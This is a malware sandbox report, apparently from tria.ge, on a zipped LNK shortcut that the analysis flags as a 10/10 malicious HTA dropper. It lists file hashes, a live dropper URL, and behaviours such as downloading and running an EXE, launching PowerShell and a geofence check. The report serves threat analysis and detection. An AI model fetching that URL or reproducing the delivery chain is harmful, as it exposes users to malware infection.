Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    Doc.zip

  • Size

    744B

  • Sample

    240522-f1lc5add2z

  • MD5

    34de20fe156557d6d6d0a371f70ec5d5

  • SHA1

    820a83383b023d71640c159f146bf14bee096d98

  • SHA256

    204b7ddb7313918dc965ad5335d350ec2457843a66141011ebec50b8ea0e05af

  • SHA512

    8d0df03876aa820498e2b3664ea4c673d621051b43fcf6bfee3f5e66beedc61e39734a1851013d475a4a902855765e7cfa2cb58d862815af5f518eae8e829633

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://foundationforwomenshealth.com/rooming.hta

Targets

    • Target

      Doc.lnk

    • Size

      1KB

    • MD5

      60f1320faf25bc20101c4312f82a72f8

    • SHA1

      a37a8f932db503eed34cbe9aa1db40f63b36fee1

    • SHA256

      bb26c65d29da78c698c19344058832b21593d27f4d89b5118345bb76614a564a

    • SHA512

      96652e9e0a96545449a260c19d920eb3f1debc879e76f5a594848a28ef165b733ca61fcc75636781289e30cc7e87aae11028ff159a1bdc93a274dbed99f03d07

    Score
    10/10
    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks